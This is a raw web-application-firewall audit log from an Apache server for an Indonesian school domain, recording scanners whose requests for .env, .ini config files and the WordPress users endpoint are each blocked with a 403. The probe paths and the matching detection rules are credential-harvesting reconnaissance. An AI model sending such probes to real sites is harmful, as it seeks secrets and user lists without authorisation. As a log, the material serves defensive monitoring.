Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fc9536a-Z-- --b93db70b-A-- [12/Jun/2025:19:57:06 +0700] aErOoqF10OasdbQdujhFGAAAAMQ 103.236.140.4 36736 103.236.140.4 8181 --b93db70b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.181.8.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.181.8.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b93db70b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b93db70b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749733026596953 3141 (- - -) Stopwatch2: 1749733026596953 3141; combined=1406, p1=502, p2=874, p3=0, p4=0, p5=30, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b93db70b-Z-- --bc316e6a-A-- [12/Jun/2025:20:13:11 +0700] aErSZ6F10OasdbQdujhFUQAAAM4 103.236.140.4 36908 103.236.140.4 8181 --bc316e6a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-gb; GT-I9305 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --bc316e6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc316e6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749733991370741 926 (- - -) Stopwatch2: 1749733991370741 926; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc316e6a-Z-- --9d86df76-A-- [12/Jun/2025:20:13:12 +0700] aErSaMCW7vAFWQIjJpyx-wAAAFQ 103.236.140.4 36910 103.236.140.4 8181 --9d86df76-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) --9d86df76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d86df76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749733992046671 821 (- - -) Stopwatch2: 1749733992046671 821; combined=317, p1=276, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d86df76-Z-- --be48c046-A-- [12/Jun/2025:20:37:31 +0700] aErYG8CW7vAFWQIjJpzKgwAAAE4 103.236.140.4 33240 103.236.140.4 8181 --be48c046-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.135.232.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.135.232.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 Accept: */* --be48c046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be48c046-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749735451535505 678 (- - -) Stopwatch2: 1749735451535505 678; combined=263, p1=235, p2=0, p3=0, p4=0, p5=28, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be48c046-Z-- --7b3b0d1d-A-- [12/Jun/2025:20:54:08 +0700] aErcAPiOwnjCOc5ARoVOaQAAABU 103.236.140.4 41944 103.236.140.4 8181 --7b3b0d1d-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Mobile Safari/537.36 Accept-Charset: utf-8 --7b3b0d1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b3b0d1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749736448453474 848 (- - -) Stopwatch2: 1749736448453474 848; combined=380, p1=343, p2=0, p3=0, p4=0, p5=36, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b3b0d1d-Z-- --7f59516d-A-- [12/Jun/2025:21:32:46 +0700] aErlDmDP2O-J0msTyvWsIgAAAJg 103.236.140.4 43464 103.236.140.4 8181 --7f59516d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7f59516d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f59516d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749738766434031 770 (- - -) Stopwatch2: 1749738766434031 770; combined=361, p1=326, p2=0, p3=0, p4=0, p5=35, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f59516d-Z-- --10fe6d4a-A-- [12/Jun/2025:21:32:47 +0700] aErlD8CW7vAFWQIjJpwFIQAAAEg 103.236.140.4 43516 103.236.140.4 8181 --10fe6d4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --10fe6d4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10fe6d4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749738767829072 902 (- - -) Stopwatch2: 1749738767829072 902; combined=403, p1=363, p2=0, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fe6d4a-Z-- --650e570a-A-- [12/Jun/2025:22:09:54 +0700] aErtwmDP2O-J0msTyvXT0gAAAIs 103.236.140.4 41216 103.236.140.4 8181 --650e570a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.138.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.138.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --650e570a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --650e570a-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749740994917159 724 (- - -) Stopwatch2: 1749740994917159 724; combined=326, p1=293, p2=0, p3=0, p4=0, p5=33, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --650e570a-Z-- --3db5c943-A-- [12/Jun/2025:23:08:55 +0700] aEr7l_iOwnjCOc5ARoXLIgAAAAk 103.236.140.4 60134 103.236.140.4 8181 --3db5c943-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.231.243.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.231.243.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3db5c943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3db5c943-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749744535681201 2554 (- - -) Stopwatch2: 1749744535681201 2554; combined=1215, p1=475, p2=712, p3=0, p4=0, p5=27, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3db5c943-Z-- --20aacc50-A-- [12/Jun/2025:23:34:06 +0700] aEsBfqF10OasdbQdujg9hAAAANA 103.236.140.4 59482 103.236.140.4 8181 --20aacc50-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --20aacc50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20aacc50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749746046081578 699 (- - -) Stopwatch2: 1749746046081578 699; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20aacc50-Z-- --d650bf1d-A-- [12/Jun/2025:23:44:43 +0700] aEsD-2DP2O-J0msTyvVAyAAAAJM 103.236.140.4 54970 103.236.140.4 8181 --d650bf1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72 Accept-Charset: utf-8 --d650bf1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d650bf1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749746683653647 1337 (- - -) Stopwatch2: 1749746683653647 1337; combined=684, p1=620, p2=0, p3=0, p4=0, p5=64, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d650bf1d-Z-- --2491f106-A-- [12/Jun/2025:23:59:16 +0700] aEsHZPiOwnjCOc5ARoX57QAAAAs 103.236.140.4 35446 103.236.140.4 8181 --2491f106-B-- GET /config/php.ini HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.54.229.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.54.229.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cache-Control: no-store Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,fr;q=0.6 --2491f106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2491f106-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749747556321543 2176 (- - -) Stopwatch2: 1749747556321543 2176; combined=1017, p1=474, p2=509, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2491f106-Z-- --0dddd40b-A-- [12/Jun/2025:23:59:23 +0700] aEsHa_iOwnjCOc5ARoX6CwAAABc 103.236.140.4 35742 103.236.140.4 8181 --0dddd40b-B-- GET /config.ini HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.54.229.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.54.229.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cache-Control: no-store Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,fr;q=0.6 --0dddd40b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dddd40b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749747563798937 2110 (- - -) Stopwatch2: 1749747563798937 2110; combined=780, p1=389, p2=367, p3=0, p4=0, p5=24, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dddd40b-Z-- --4160776e-A-- [13/Jun/2025:00:05:37 +0700] aEsI4fiOwnjCOc5ARoX_nQAAABg 103.236.140.4 49752 103.236.140.4 8181 --4160776e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre Accept-Charset: utf-8 --4160776e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4160776e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749747937072176 764 (- - -) Stopwatch2: 1749747937072176 764; combined=360, p1=322, p2=0, p3=0, p4=0, p5=38, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4160776e-Z-- --567b985e-A-- [13/Jun/2025:00:42:47 +0700] aEsRl_iOwnjCOc5ARoUf4AAAAAA 103.236.140.4 47968 103.236.140.4 8181 --567b985e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 143.110.213.72 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 143.110.213.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --567b985e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --567b985e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749750167659346 913 (- - -) Stopwatch2: 1749750167659346 913; combined=329, p1=291, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --567b985e-Z-- --b8f68d7f-A-- [13/Jun/2025:01:31:50 +0700] aEsdFmDP2O-J0msTyvWbqwAAAI0 103.236.140.4 42036 103.236.140.4 8181 --b8f68d7f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.94.227.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.94.227.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8f68d7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8f68d7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749753110563325 3543 (- - -) Stopwatch2: 1749753110563325 3543; combined=1409, p1=452, p2=913, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8f68d7f-Z-- --d87cf237-A-- [13/Jun/2025:02:10:37 +0700] aEsmLcCW7vAFWQIjJpz0HAAAAE4 103.236.140.4 42282 103.236.140.4 8181 --d87cf237-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d87cf237-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d87cf237-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749755437651989 809 (- - -) Stopwatch2: 1749755437651989 809; combined=322, p1=291, p2=0, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d87cf237-Z-- --acd79535-A-- [13/Jun/2025:02:17:10 +0700] aEsntviOwnjCOc5ARoU2jAAAAAI 103.236.140.4 56058 103.236.140.4 8181 --acd79535-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.24.227 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --acd79535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acd79535-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749755830795745 844 (- - -) Stopwatch2: 1749755830795745 844; combined=375, p1=337, p2=0, p3=0, p4=0, p5=38, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acd79535-Z-- --c2327046-A-- [13/Jun/2025:02:31:32 +0700] aEsrFPiOwnjCOc5ARoU3zwAAAAw 103.236.140.4 59844 103.236.140.4 8181 --c2327046-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.122.148.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.122.148.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2327046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2327046-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 